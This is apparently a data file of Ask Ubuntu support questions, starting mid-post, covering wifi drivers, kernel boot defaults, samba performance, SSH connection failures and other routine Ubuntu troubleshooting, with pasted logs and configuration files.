[ 968 ] : < info > ( wlan0 ) : device state change : config - > disconnected ( reason 'user-requested ' ) [ 50 30 39 ] apr 7 17:03:04 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : deactivating device ( reason 'user-requested ' ) [ 39 ] apr 7 17:03:04 kaspar-all-series networkmanager [ 968 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > disconnected apr 7 17:03:04 kaspar-all-series whoopsie [ 1018 ] : offline and this is output from nm-tool : networkmanager tool state : disconnected - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 74 : d0:2b:9d:81:7f capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192cu state : disconnected default : no hw address : a0 : f3 : c1:1c : a4 : a8 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points seened : infra , 00:0e:2e:6e : f4 : ca , freq 2462 mhz , rate 54 mb/s , strength 83 wpa2 maybe worth to mention that i have also tried to install the windows drivers with windows drivers installer program that linux has , but that resulted with horrible effects . i had to reinstall ubuntu after that . so yes , what could be a problem here ? am i using the wrong open-source driver here ? and do you guys need anymore info . i hope i took the syslog info from the right spots , from the time table it does seem like the time the network anomaly occurred .
444520	how to set an image generated by update-initramfs to be loaded by default	in my adventures in trying to revert a kernel upgrade ( it broke my wifi for some reason ) , i was able to generate a boot image for the previous kernel ( # update-initramfs -c -k 3.11.0-17-generic ) i deleted the newer kernel boot image for good measure ( # update-initramfs -d -k 3.11.0-19-generic ) now every other boot my machine goes into panic mode because it ca n't find the 3.11.0-19 kernel version , and i have to hard reset , which puts me into boot menu where i can select the proper version . my question is , how can i make 3.11.0-17-generic my default boot kernel ( at least until i figure out what caused the issue with 19 and can upgrade again ) edit : for future visitors , images created by update-initramfs -c should be visible in grub ( for me its under advanced options for xubuntu ) . just follow one of the answers in how do i change the grub boot order ?
444522	ca n't locate packages vesta , vesta-nginx and vesta-php	i have a problem with installing vesta control panel on my digitalocean vps on ubuntu 12.10 . the system is updated and upgraded . i got the following error message : w : failed to fetch http : //apt.vestacp.com/quantal/dists/quantal/vesta/binary-amd64/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . reading package lists ... done building dependency tree reading state information ... done e : unable to locate package vesta e : unable to locate package vesta-nginx e : unable to locate package vesta-php error : apt-get install failed
444523	changing which monitor/desktop files download to	i just installed ubuntu after using mint for a year or so and i am in love to say the least . one issue i had with mint that i never really researched was that when i download files or copy them to my desktop , they always appear on my left monitor . the way i 'm set up is that my laptop is in a dock in the middle and i have a monitor on the left and right . i use my laptop screen as my primary desktop with my unity launch bar and would like if files would appear their when downloaded/copied . sorry if this is a mundane question and though it seems small it would be awesome if i could accomplish this . thanks for any help !
444531	unusual network activity	i noticed that my network monitor was showing intense activity ( mostly download at high rates ) even though my browser wasnt loading any pages . i installed nethogs and checked the usage and got the below result . ( i took the screenshot right after reconnecting my modem . that is why the sent/received section is showing empty values . but it goes up later on ) could anyone please let me know what these programs are . should i be concerned ? thanks .
444535	how would i make a program go back to the start .	so i have my program and i can not figure out how to make the program loop back to the start . i have more of a program however this is the part where i would like the program to restart if i picked yes exit 0 and exit 1 are placeholders at the moment since i do not know how to make it loop . thank you for your help in advance . echo `` is that all sir ? ( yes/no ) '' if [ $ word = `` yes '' ] then exit 0 if [ $ word = `` no '' ] then exit 1 fi
444536	xamppp no mcrypt.ini when intalling lavarel	i tried to install laravel on xubuntu 14.04 i searched for every method , they all go like this . by the way , i tried installing php and apache without xampp and did n't as well so it 's not about xampp , i just went for xampp because it can easily be shut down , my laptop freezes on shut down if apache is working in background . xampp is easier to work with . mcrypt is enabled in php.ini , i did aptitude install php5-mcrypt mcrypt and tried apt-get as well . in fact i installed aptitude just because some so user said it would work with aptitude . after days and days of trying , i can safely say , mcrypt.ini does not exist on my computer , reinstalled again and again , the problem is still there . whereis mcrypt.ini gives nothing , catfish could n't find it too ( catfish was able to find php.ini ) locate command does n't return anything so i can safely say , that file is missing , how do i obtain it ?
444543	ubuntu on alienware m14x	i had used linux once when i was 8 back in 2001 and i used to love it as i played the games that came with the os , then i left linux until recently since i have been hearing about all this new linux hype so i decided to give it a try . i have used this os since one semester now , it lives upto its hype and i am seriously in love with it and i had downloaded wine and have been playing games on it even tho all my games do not work `` i 'll remain patient and hope it soon becomes better '' now the only issue with the operating system is that the games i used to play was slower , then i went to settings and details and noticed that the laptop was using intel instead of nvidia gpu and optimus was not supported . i understand that there might be some devs here and experts so could any one write a tutorial for serious noobs it would help me and all the new people starting to use linux . also i wonder why ubuntu devs do not integrate wine into the os ? . `` sorry for my english and also if i had asked a question that already had been answered as i did n't find any of them fit to work for my laptop , i bricked the os multiple times '' p.s i also always get an error when i boot the os and unity shows .
444544	how to use nvidia-prime on ubuntu ?	i have optimus laptop so i have installed nvidia drivers with prime . i have googled but did n't found any help regarding using nvidia-prime . so how do i use my optimus card ? i know i can switch to optimus card as shown in pic , but the thing that my firefox still uses intel card . webgl aquarium - webglsamples show same frame per sec with intel and with nvidia . is there any special settings when using firefox on nvidia ( optimus ) card .
444545	problem with 5.1 audio output	i installed 12.04 lts but unable to get 5.1 audio output . there is no option as such in sound setting . please help .
444546	triple-screen setup w/ two mismatched gpu 's	i am trying to run a triple-screen setup with two `` mismatched '' nvidia gpu 's , a gtx 470 and an 8400 gs , on ubuntu 13.10 . two of the monitors are hooked up to my gtx 470 and the third is hooked up to the 8400 gs . when i check the additional drivers , it suggests nvidia-319 driver for my gtx 470 and nvidia-173 for my 8400 gs . when i applied the drivers and rebooted , the system hung up on boot , and if i apply the proprietary drivers to only one gpu , only monitors hooked up into that gpu show video signal . is there a way to have proprietary drivers for both gpu 's to keep my triple-screen setup , or am i forced to run ubuntu dual-screen because of my mismatched cards ?
444548	configuring 2 identical usb 3g modems	i am trying to setup up 2 huawei e398 3g data modems on ubuntu 12.04.4 lts . these will be connecting to different 3g providers.i can connect using one of them via wvdail utility . network manager is not detecting them via mobile broadband tab . i can see modems when inputing lsusb bus 001 device 002 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard bus 001 device 004 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard i can also dial successful using one of the provider 's software.is there a way to for me to dial using both identical modems via wvdial . also what should i do to get these modems picked up by mobile broadband under network manager ?
444549	window list issue on 12.04 gnome classic in virtualbox	i have 12.04 installed on a virtualbox machine . i 'm not huge fan of unity , so i 've opted for gnome classic as my desktop . one of the big advantages of classic gnome is that you can add a `` window list '' widget to a panel , and it will show you all windows that you currently have open . however , the window list does n't seem to restrict windows to those only in the current workspace . i seem to remember this being configurable in previous versions of ubuntu , but ca n't find it anywhere ( right clicking the window list , compiz configuration manager , built-in settings , etc ) . is there any way to configure the window list to only show windows in the current workspace in gnome classic on 12.04 ?
444551	get absolute path of files using 'find ' command	is there a way to get absolute path of a file that is being searched ? for example : find .. -name `` filename '' it gives me results like ../filename but i want the full path . what i need is to find in the parent directory and its children , for a specific file , that i will use in another script later . thanks
444556	motion 3.2.12 with a logitech orbit sphere camera - does not track ?	i have installed motion and am successfully using it to display a video stream . the problem i have here is using the tracking features within motion . i keep getting ioctrl error messages when i send the pan/tilt commands . i 've since downloaded/installed guvcview which does offer these controls and confirmed i can pan/tilt as required . any idea 's how i can get motion to do the same ? i 've seen there is a patch for the logitech but i am not sure how to apply this or whether this is even necessary in the latest version of motion ? i have also found another user had the same problem but could not see how this was resolved . i also tried the setpwc from terminal to control the pan/tilt but this also errored out . any help is appreciated .
444560	unable to install juniper vpn client on 13.10	i am trying to install juniper 's vpn client for ubuntu 13.10 but i have not been successful so far . i wish to install the client to be able to connect to my school 's vpn . i downloaded the setup and installed it but there seems to be an issue with the installer . can someone please guide me with the correct set of steps to installing a vpn client on ubuntu 13.10 ? thanks a lot !
444562	change icons back to global theme	i changed some of my individual icons via rooted nautilus and selected my own different icons . but now i want to make them back to whatever my default global icon theme is . is there anyway to make them default again ? to clarify a little more . i have a tweak program and can change the global icon theme with one click , but the icons i changed with root will not change . can i make them all change again without having to change each one individually every time i want to change the global theme ?
444563	maas / nodes have limited internet access after install	i´ve installed a test environment for maas and juju . maas manages both dhcp and dns . following setup : maas01 - static ip juju01 - dhcp and dns from maas01 node01 - dhcp and dns from maas01 and pxe boot the node01 starts just fine and the juju is able to resolve it correctly . all the maschines have access to the internet through the gateway . when i´m trying to bootstrap the juju with the maas , the juju connects to the node01 and does some apt-get stuff . it throws an error on downloading the current agent . i´ve tried to do some apt-get on the node01 . works just fine . but everything else is not possible ( pinging google , ... ) i do not understand this behaviour , because of the juju01 getting the same dhcp and dns data from the maas01 . any idea how i can get my nodes to have access to the internet ? thank you ! hauke
444564	replace mac os x boot loader with ubuntu	currently , i have my macbook pro 's ssd filled with a mavericks installation , and after some frustrating hours , an external hdd loaded with ubuntu 13.04 ( soon to be 13.10 ) . as of now , the only way for me to load up ubuntu is to hold down the option key when i start up my mac and hope that os x 's bootloader recognizes the external hdd . what i want to know is if there is any way for me to replace the mac bootloader with grub , so that i can instantly have the option of booting into ubuntu or os x .
444565	black screen after login on main account , after latex install failed	i recently tried installing latex on my ubuntu 13.10 system . the installation failed but i cant remember the error-messages . after the failed installation the memory cache was quite full and the system was running slow . i therefore restarted the system . however , after reboot , the screen turns black with only the mousepointer showing after i have typed in my password and hit enter on the login screen . the weird things is that guest session login is seemless , but i cant access anything from there . any suggestions ? help is much appreciated .
444566	how to use python3 shortcuts on emacs ?	i am new to emacs and i am trying to set python3 as default interpreter . i have installed from software centre the python plugin for emacs . i can run a python3 file going to pyexec -- > execute file ... - > python3 file and in a similar way i can run a region of code pyexec -- > execute region- > execute region python3 i would like to execute python3 file and region using keyboard short cut in particular i need something to run all the file and something to run the lightened region of code
444570	samsung galaxy ace gt 25830i	is it possible to run ubuntu as the operating system in my samsung galaxy ace gt s5830i ... im currently using jellyblast which is kinda boring
444571	completly remove windows from my computer	i had dual boot on my pc ( windows 8 and ubuntu 13.10 ) . i recently removed windows partitions and ended with the following partitions : i seem unable to use my unllocated space ( gparted does n't let me expand the remaning partitions to take advantage of it ) . unfortunately the pc still shows me the boot menu to choose the operating system to boot . how can i can i fix this since i only have one os ? also can i remove the fat32 partition and unknown partition ? can i use my unallocated space ? thank you very much .
444573	linux drivers for hp pavilion g6-2201ax	i have the above mentioned laptop with pre installed windows 8 . i have dual booted with ubuntu 12.04 . i have wifi issue , my wifi card being ralink rt3290 pci . i tried to install it by downloading from mediatek website but i am getting sudo make error 2 . please help . also i have tried 14.04 beta 2 . ethernet detects but fails to establish connection . also no bluetooth .
444583	postfix as relay server . forward email from one domain to another	i need to relay/forward/whatever all mail from : address3 @ domain0.com to address3 @ domain1.com i 'm going to set up the mx record for domain0.com to point to postfix . domain1.com is a google apps account . this is a temporary setup while we migrate some stuff ... anyway , i 'm pouring through the postfix man pages but not having much luck . i 'm on a time crunch , so any direction is helpful . thank you !
444585	are reboots required after updates ?	i noticed from other posts that /var/run/reboot-required.pkgs tells what package is requiring a reboot , but this file does not exist anymore . i have been running ubuntu 13.10 ( and updated to beta 14.04 ) and realized that my laptop has not asked me for a reboot once . that may be because i reboot it a few times a week already , but it has never even asked . back in the day , maybe around ubuntu 10.04 i remember very vividly the red gear on the top right of gnome/unity requesting reboot , but this no longer happens . did the kernel update to not require these reboots anymore ? how would that work ?
444586	ubuntu partition	a problem happened to my windows xp partition , i have also a ubuntu 10.10 partition . there were options to choose os when starting laptop . because the problem is in xp partition , those options are not there now , it goes to currupt windows directly . i think ubuntu 10.10 partition is good and clear of problems , i can access all partions on hard drive through ubuntu installation dvd . how to make my laptop run using the ubuntu 10.10 partition directly , manually or somehow , because my windows xp partition is curropted and i want to take my files from it using testdisk . obs . : actually , is xp currupted because of some damage in the hrad in xp partition ?
444587	thinkpad t430 express card driver	i 'm running 13.10 x64 on a t430 . in general everything works well . however , the os does not see the express card when it is inserted . i checked and the express card slot is enabled in the bios . any ideas ? thanks .
444590	can not boot from dvd 12.04	am trying to install for dual boot system . ok on one xp computer but on xp laptop i receive following message - `` unable to boot - please use a kernel appropriate for your cpu . not present pae . do n't understand what is meant by pae . have burnt two dvds one on each machine , and whilst both work on the pc , both come up with the same message on the laptop . can anyone please point me in the right direction to correct this error . thanks , roy
444591	samba performance with nas	my question is simple : how to get the maximum performance with samba shares with nas . here is my smb.conf file : # # sample configuration file for the samba suite for debian gnu/linux . # # # this is the main samba configuration file . you should read the # smb.conf ( 5 ) manual page in order to understand the options listed # here . samba has a huge number of configurable options most of which # are not shown in this example # # some options that are often worth tuning have been included as # commented-out examples in this file . # - when such options are commented with `` ; '' , the proposed setting # differs from the default samba behaviour # - when commented with `` # '' , the proposed setting is the default # behaviour of samba but the option is considered important # enough to be mentioned here # # note : whenever you modify this file you should run the command # `` testparm '' to check that you have not made any basic syntactic # errors . # a well-established practice is to name the original file # `` smb.conf.master '' and create the `` real '' config file with # testparm -s smb.conf.master > smb.conf # this minimizes the size of the really used smb.conf file # which , according to the samba team , impacts performance # however , use this with caution if your smb.conf file contains nested # `` include '' statements . see debian bug # 483187 for a case # where using a master file is not a good idea . # # ======================= global settings ======================= [ global ] # # browsing/identification # # # # change this to the workgroup/nt-domain name your samba server will part of workgroup = mshome # server string is the equivalent of the nt description field server string = % h server ( samba , ubuntu ) # windows internet name serving support section : # wins support - tells the nmbd component of samba to enable its wins server # wins support = no # wins server - tells the nmbd components of samba to be a wins client # note : samba can be either a wins server , or a wins client , but not both ; wins server = w.x.y.z # this will prevent nmbd to search for netbios names through dns . dns proxy = no # what naming service and in what order should we use to resolve host names # to ip addresses ; name resolve order = lmhosts host wins bcast # # # # networking # # # # # the specific set of interfaces / networks to bind to # this can be either the interface name or an ip address/netmask ; # interface names are normally preferred ; interfaces = 127.0.0.0/8 eth0 # only bind to the named interfaces and/or networks ; you must use the # 'interfaces ' option above to use this . # it is recommended that you enable this feature if your samba machine is # not protected by a firewall or is a firewall itself . however , this # option can not handle dynamic or non-broadcast interfaces correctly . ; bind interfaces only = yes # # # # debugging/accounting # # # # # this tells samba to use a separate log file for each machine # that connects log file = /var/log/samba/log. % m # cap the size of the individual log files ( in kib ) . max log size = 1000 # if you want samba to only log through syslog then set the following # parameter to 'yes ' . # syslog only = no # we want samba to log a minimum amount of information to syslog . everything # should go to /var/log/samba/log . { smbd , nmbd } instead . if you want to log # through syslog you should set the following parameter to something higher . syslog = 0 # do something sensible when samba crashes : mail the admin a backtrace panic action = /usr/share/samba/panic-action % d # # # # # # # authentication # # # # # # # # `` security = user '' is always a good idea . this will require a unix account # in this server for every user accessing the server . see # /usr/share/doc/samba-doc/htmldocs/samba3-howto/servertype.html # in the samba-doc package for details . # security = user # you may wish to use password encryption . see the section on # 'encrypt passwords ' in the smb.conf ( 5 ) manpage before enabling . ; encrypt passwords = yes # if you are using encrypted passwords , samba will need to know what # password database type you are using . ; passdb backend = tdbsam obey pam restrictions = yes # this boolean parameter controls whether samba attempts to sync the unix # password with the smb password when the encrypted smb password in the # passdb is changed . unix password sync = yes # for unix password sync to work on a debian gnu/linux system , the following # parameters must be set ( thanks to ian kahan < < kahan @ informatik.tu-muenchen.de > for # sending the correct chat script for the passwd program in debian sarge ) . passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . # this boolean controls whether pam will be used for password changes # when requested by an smb client instead of the program listed in # 'passwd program ' . the default is 'no ' . pam password change = yes # this option controls how unsuccessful authentication attempts are mapped # to anonymous connections map to guest = bad user # # # # # # # # # # domains # # # # # # # # # # # # is this machine able to authenticate users . both pdc and bdc # must have this setting enabled . if you are the bdc you must # change the 'domain master ' setting to no # ; domain logons = yes # # the following setting only takes effect if 'domain logons ' is set # it specifies the location of the user 's profile directory # from the client point of view ) # the following required a [ profiles ] share to be setup on the # samba server ( see below ) ; logon path = \\ % n\profiles\ % u # another common choice is storing the profile in the user 's home directory # ( this is samba 's default ) # logon path = \\ % n\ % u\profile # the following setting only takes effect if 'domain logons ' is set # it specifies the location of a user 's home directory ( from the client # point of view ) ; logon drive = h : # logon home = \\ % n\ % u # the following setting only takes effect if 'domain logons ' is set # it specifies the script to run during logon . the script must be stored # in the [ netlogon ] share # note : must be store in 'dos ' file format convention ; logon script = logon.cmd # this allows unix users to be created on the domain controller via the samr # rpc pipe . the example command creates a user account with a disabled unix # password ; please adapt to your needs ; add user script = /usr/sbin/adduser -- quiet -- disabled-password -- gecos `` '' % u # this allows machine accounts to be created on the domain controller via the # samr rpc pipe . # the following assumes a `` machines '' group exists on the system ; add machine script = /usr/sbin/useradd -g machines -c `` % u machine account '' -d /var/lib/samba -s /bin/false % u # this allows unix groups to be created on the domain controller via the samr # rpc pipe . ; add group script = /usr/sbin/addgroup -- force-badname % g # # # # # # # # # # printing # # # # # # # # # # # if you want to automatically load your printer list rather # than setting them up individually then you 'll need this # load printers = yes # lpr ( ng ) printing . you may wish to override the location of the # printcap file ; printing = bsd ; printcap name = /etc/printcap # cups printing . see also the cupsaddsmb ( 8 ) manpage in the # cupsys-client package . ; printing = cups ; printcap name = cups # # # # # # # # # # # # misc # # # # # # # # # # # # # using the following line enables you to customise your configuration # on a per machine basis . the % m gets replaced with the netbios name # of the machine that is connecting ; include = /home/samba/etc/smb.conf. % m # most people will find that this option gives better performance . # see smb.conf ( 5 ) and /usr/share/doc/samba-doc/htmldocs/samba3-howto/speed.html # for details # you may want to add the following on a linux system : # so_rcvbuf=8192 so_sndbuf=8192 # socket options = tcp_nodelay # the following parameter is useful only if you have the linpopup package # installed . the samba maintainer and the linpopup maintainer are # working to ease installation and configuration of linpopup and samba . ; message command = /bin/sh -c '/usr/bin/linpopup `` % f '' `` % m '' % s ; rm % s ' & # domain master specifies samba to be the domain master browser . if this # machine will be configured as a bdc ( a secondary logon server ) , you # must set this to 'no ' ; otherwise , the default behavior is recommended . # domain master = auto # some defaults for winbind ( make sure you 're not using the ranges # for something else . ) ; idmap uid = 10000-20000 ; idmap gid = 10000-20000 ; template shell = /bin/bash # the following was the default behaviour in sarge , # but samba upstream reverted the default because it might induce # performance issues in large organizations . # see debian bug # 368251 for some of the consequences of *not* # having this setting and smb.conf ( 5 ) for details . ; winbind enum groups = yes ; winbind enum users = yes # setup usershare options to enable non-root users to share folders # with the net usershare command . # maximum number of usershare . 0 ( default ) means that usershare is disabled . ; usershare max shares = 100 # allow users who 've been granted usershare privileges to create # public shares , not just authenticated ones usershare allow guests = yes username map = /etc/samba/smbusers security = user guest ok = yes guest account = laurent06000 # ======================= share definitions ======================= # un-comment the following ( and tweak the other settings below to suit ) # to enable the default home directory shares . this will share each # user 's home director as \\server\username ; [ homes ] ; comment = home directories ; browseable = no # by default , the home directories are exported read-only . change the # next parameter to 'no ' if you want to be able to write to them . ; read only = yes # file creation mask is set to 0700 for security reasons . if you want to # create files with group=rw permissions , set next parameter to 0775. ; create mask = 0700 # directory creation mask is set to 0700 for security reasons . if you want to # create dirs . with group=rw permissions , set next parameter to 0775. ; directory mask = 0700 # by default , \\server\username shares can be connected to by anyone # with access to the samba server . un-comment the following parameter # to make sure that only `` username '' can connect to \\server\username # the following parameter makes sure that only `` username '' can connect # # this might need tweaking when using external authentication schemes ; valid users = % s # un-comment the following and create the netlogon directory for domain logons # ( you need to configure samba to act as a domain controller too . ) ; [ netlogon ] ; comment = network logon service ; path = /home/samba/netlogon ; guest ok = yes ; read only = yes # un-comment the following and create the profiles directory to store # users profiles ( see the `` logon path '' option above ) # ( you need to configure samba to act as a domain controller too . ) # the path below should be writable by all users so that their # profile directory may be created the first time they log on ; [ profiles ] ; comment = users profiles ; path = /home/samba/profiles ; guest ok = no ; browseable = no ; create mask = 0600 ; directory mask = 0700 [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes ; guest ok = no ; read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers ; browseable = yes ; read only = yes ; guest ok = no # uncomment to allow remote administration of windows print drivers . # you may need to replace 'lpadmin ' with the name of the group your # admin users are members of . # please note that you also need to set appropriate unix permissions # to the drivers directory for these users to have write rights in it ; write list = root , @ lpadmin # a sample share for sharing your cd-rom with others . ; [ cdrom ] ; comment = samba server 's cd-rom ; read only = yes ; locking = no ; path = /cdrom ; guest ok = yes # the next two parameters show how to auto-mount a cd-rom when the # cdrom share is accesed . for this to work /etc/fstab must contain # an entry like this : # # /dev/scd0 /cdrom iso9660 defaults , noauto , ro , user 0 0 # # the cd-rom gets unmounted automatically after the connection to the # # if you do n't want to use auto-mounting/unmounting make sure the cd # is mounted on /cdrom # ; preexec = /bin/mount /cdrom ; postexec = /bin/umount /cdrom [ torrents ] comment = torrents from pc-de-ldp path = /media/nouveau nom/torrents writeable = yes ; browseable = yes guest ok = yes [ laurent06000 ] path = /media/705c48fd-e126-4af4-baea-f7692de7f138_/home/laurent06000 writeable = yes ; browseable = yes valid users = laurent06000 , laurent06000 , smbguest [ laurent06000-1 ] path = /media/0cc3d633-b99e-4578-a54e-687afd200226_/laurent06000 writeable = yes ; browseable = yes valid users = laurent06000 , laurent06000 , smbguest [ torrentspassport ] path = /media/my passport/torrents writeable = yes ; browseable = yes guest ok = yes [ torrentselements ] path = /media/elements__/torrents writeable = yes ; browseable = yes guest ok = yes [ large__ ] path = /media/large__ writeable = yes ; browseable = yes guest ok = yes [ nouveau nom ] path = /media/nouveau nom writeable = yes ; browseable = yes guest ok = yes i only changed the line `` workgroup = mshome '' to meet my network settings . i 've read the general documentation samba documentation and some documentation in the awahi wiki but i must say i 'm a bit lost in all the information provided . could anyone help me maximize samba transfer rates ? would it be better to use nfs shares ? i work with ubuntu version 12.04 ( precise ) 64 bits and various nas like diskstation ds 213j , wd mycloud ( 2tb and 3tb < < < < == those are the ones i have the slowest transfer rate ) , buffalo ls-wxl serie . laurent06000
444597	unable to connect to the internet from freshly installed os	i have been a windows xp user so far . i have freshly installed ubuntu 12.04.4 om my flash drive and am booting my dell vostro 1015 from this usb device . wifi network works perfectly fine with xp but do not show up on ubuntu . it always says wireless network disconnected because broadcom sta is not activated . when i try to do that from additional drivers it gets stuck . it takes forever giving the message downloading and installing but there is no end . the window does not close by clicking on x nor does cancel work even on repeated clicks . i finally had to shut the system down in middle of the process . i know similar questions have been asked but none of them solved my problem . i tried the lspci command as well as dmseg and couple of more but i do not understand what they mean . please help me somebody , please .
444598	how do i shrink a dynamically growing vdi disk from virtualbox ?	my dynamically growing virtual disks ( vdi ) from various ubuntu installations in virtual box are actually steadily `` growing '' indeed . deleting of files in the virtual machine does not free the space my vdi file took from the host hard disk space . how do i shrink these files to give the unused hard disk space back to the host ?
444601	ssh connection closed by remote host	hello so i 'm fairly new to ubuntu . i 've been trying to connect to my university 's cluster using the ssh name @ hostname command and after waiting for around 5 minutes i get notified that the connection is closed by host ip . it does n't even ask me for my password . yet when i try to access the cluster on os x using the same ssh command , i can access it with no issues . here 's the debug log : openssh_5.9p1 debian-5ubuntu1.2 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to [ 194.126.138.128 ] port 22. debug1 : connection established . debug1 : identity file /home/ramez/.ssh/id_rsa type -1 debug1 : identity file /home/ramez/.ssh/id_rsa-cert type -1 debug1 : identity file /home/ramez/.ssh/id_dsa type -1 debug1 : identity file /home/ramez/.ssh/id_dsa-cert type -1 debug1 : identity file /home/ramez/.ssh/id_ecdsa type -1 debug1 : identity file /home/ramez/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.3 debug1 : match : openssh_5.3 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.9p1 debian-5ubuntu1.2 debug2 : fd 3 setting o_nonblock debug3 : load_hostkeys : found key type rsa in file /home/ramez/.ssh/known_hosts:1 debug3 : load_hostkeys : loaded 1 keys debug3 : order_hostkeyalgs : prefer hostkeyalgs : ssh-rsa-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-rsa debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug2 : kex_parse_kexinit : ecdh-sha2-nistp256 , ecdh-sha2-nistp384 , ecdh-sha2-nistp521 , diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa-cert-v01 @ openssh.com , ssh-rsa-cert-v00 @ openssh.com , ssh-rsa , ecdsa-sha2-nistp256-cert-v01 @ openssh.com , ecdsa-sha2-nistp384-cert-v01 @ openssh.com , ecdsa-sha2-nistp521-cert-v01 @ openssh.com , ssh-dss-cert-v01 @ openssh.com , ssh-dss-cert-v00 @ openssh.com , ecdsa-sha2-nistp256 , ecdsa-sha2-nistp384 , ecdsa-sha2-nistp521 , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-sha2-256 , hmac-sha2-256-96 , hmac-sha2-512 , hmac-sha2-512-96 , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : none , zlib @ openssh.com , zlib debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : kex_parse_kexinit : diffie-hellman-group-exchange-sha256 , diffie-hellman-group-exchange-sha1 , diffie-hellman-group14-sha1 , diffie-hellman-group1-sha1 debug2 : kex_parse_kexinit : ssh-rsa , ssh-dss debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : aes128-ctr , aes192-ctr , aes256-ctr , arcfour256 , arcfour128 , aes128-cbc,3des-cbc , blowfish-cbc , cast128-cbc , aes192-cbc , aes256-cbc , arcfour , rijndael-cbc @ lysator.liu.se debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : hmac-md5 , hmac-sha1 , umac-64 @ openssh.com , hmac-ripemd160 , hmac-ripemd160 @ openssh.com , hmac-sha1-96 , hmac-md5-96 debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : none , zlib @ openssh.com debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : debug2 : kex_parse_kexinit : first_kex_follows 0 debug2 : kex_parse_kexinit : reserved 0 debug2 : mac_setup : found hmac-md5 debug1 : kex : server- > client aes128-ctr hmac-md5 none debug2 : mac_setup : found hmac-md5 debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug2 : dh_gen_key : priv key bits set : 132/256 debug2 : bits set : 491/1024 debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : server host key : rsa 73 : e5:0d:11 : f6 : e4:04 : fb:5b : ae : dc : ea:57:44:7d : a7 debug3 : load_hostkeys : found key type rsa in file /home/ramez/.ssh/known_hosts:1 debug3 : load_hostkeys : loaded 1 keys debug3 : load_hostkeys : loading entries for host `` 194.126.138.128 '' from file `` /home/ramez/.ssh/known_hosts '' debug3 : load_hostkeys : found key type rsa in file /home/ramez/.ssh/known_hosts:2 debug3 : load_hostkeys : loaded 1 keys debug1 : host '194.126.138.128 ' is known and matches the rsa host key . debug1 : found key in /home/ramez/.ssh/known_hosts:1 debug2 : bits set : 494/1024 debug1 : ssh_rsa_verify : signature correct debug2 : kex_derive_keys debug2 : set_newkeys : mode 1 debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug2 : set_newkeys : mode 0 debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug2 : service_accept : ssh-userauth debug1 : ssh2_msg_service_accept received debug2 : key : /home/ramez/.ssh/id_rsa ( ( nil ) ) debug2 : key : /home/ramez/.ssh/id_dsa ( ( nil ) ) debug2 : key : /home/ramez/.ssh/id_ecdsa ( ( nil ) ) debug1 